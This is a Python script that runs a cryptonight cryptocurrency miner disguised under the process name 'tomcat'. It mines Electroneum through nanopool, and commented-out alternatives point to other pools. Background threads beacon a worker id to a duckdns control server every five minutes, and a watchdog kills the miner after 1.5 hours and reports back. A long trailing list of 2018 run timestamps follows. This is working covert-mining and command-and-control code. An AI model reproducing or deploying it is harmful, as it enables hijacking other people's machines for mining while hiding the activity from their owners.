import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:03.620617
#2018-02-17 16:21:06.056612
#2018-02-17 18:10:01.789142
#2018-02-17 19:58:01.659443
#2018-02-17 21:46:06.674429
#2018-02-17 23:31:01.500608
#2018-02-18 01:20:04.572200
#2018-02-18 03:07:04.640753
#2018-02-18 04:56:05.885070
#2018-02-18 06:49:01.503549
#2018-02-18 08:38:04.929340
#2018-02-18 10:24:01.268800
#2018-02-18 12:09:07.193678
#2018-02-18 13:54:04.173395
#2018-02-18 15:44:07.809367
#2018-02-18 17:35:08.936708
#2018-02-18 19:23:06.023586
#2018-02-18 21:08:04.804825
#2018-02-18 22:55:05.028176
#2018-02-19 00:43:03.872136
#2018-02-19 02:28:07.765418
#2018-02-19 04:15:09.102719
#2018-02-19 06:01:06.305359
#2018-02-19 07:50:08.003443
#2018-02-19 09:40:08.573879
#2018-02-19 11:29:06.569620
#2018-02-19 13:17:06.836013
#2018-02-19 15:04:04.634834
#2018-02-19 16:52:01.272041
#2018-02-19 18:38:08.899647
#2018-02-19 20:23:02.163406
#2018-02-19 22:11:05.580549
#2018-02-19 23:58:02.163201
#2018-02-20 01:45:07.159395
#2018-02-20 03:31:01.641022
#2018-02-20 05:18:07.431387
#2018-02-20 07:02:06.739763
#2018-02-20 08:49:04.746730
#2018-02-20 10:33:09.366719
#2018-02-20 12:18:06.434952
#2018-02-20 14:07:01.259520
#2018-02-20 15:51:01.449128
#2018-02-20 17:39:01.307875
#2018-02-20 19:27:07.645153
#2018-02-20 21:14:05.858591
#2018-02-20 22:58:03.912664
#2018-02-21 00:42:03.992831
#2018-02-21 02:27:07.348455
#2018-02-21 04:16:03.961564
#2018-02-21 06:03:10.082854
#2018-02-21 07:50:08.029753
#2018-02-21 09:36:06.733172
#2018-02-21 11:23:09.532919
#2018-02-21 13:12:01.554835
#2018-02-21 14:58:04.755733
#2018-02-21 16:46:01.444776
#2018-02-21 18:38:05.721381
#2018-02-21 20:23:07.301663
#2018-02-21 22:12:06.277261
#2018-02-22 00:01:05.456385
#2018-02-22 01:48:04.758179
#2018-02-22 03:35:01.446446
#2018-02-22 05:22:01.704049
#2018-02-22 07:06:04.141611
#2018-02-22 08:52:05.372260
#2018-02-22 10:40:05.324967
#2018-02-22 12:27:06.097356
#2018-02-22 14:11:09.244294
#2018-02-22 15:58:01.911435
#2018-02-22 17:44:06.488821
#2018-02-22 19:30:09.139983
#2018-02-22 21:23:07.448624
#2018-02-22 23:07:04.511094
#2018-02-23 02:29:06.682874
#2018-02-23 04:17:04.729448
#2018-02-23 06:04:07.866912
#2018-02-23 07:51:07.549773
#2018-02-23 10:10:08.387980
#2018-02-23 12:04:09.715029
#2018-02-23 13:52:05.552929
#2018-02-23 15:42:05.084604
#2018-02-23 17:28:04.390941
#2018-02-23 19:14:01.695605
#2018-02-23 20:58:07.766376
#2018-02-23 22:43:08.787261
#2018-02-24 00:30:06.509346
#2018-02-24 02:21:07.834326
#2018-02-24 04:12:01.235940
#2018-02-24 06:00:08.964478
#2018-02-24 07:48:05.170783
#2018-02-24 09:33:04.888543
#2018-02-24 11:27:03.758085
#2018-02-24 13:16:06.315025
#2018-02-24 15:07:07.312372
#2018-02-24 16:56:07.312900
#2018-02-24 18:46:05.040444
#2018-02-24 20:37:05.774908
#2018-02-24 22:43:01.392739
#2018-02-25 02:04:08.089812
#2018-02-25 05:33:05.917843
#2018-02-25 11:34:07.301170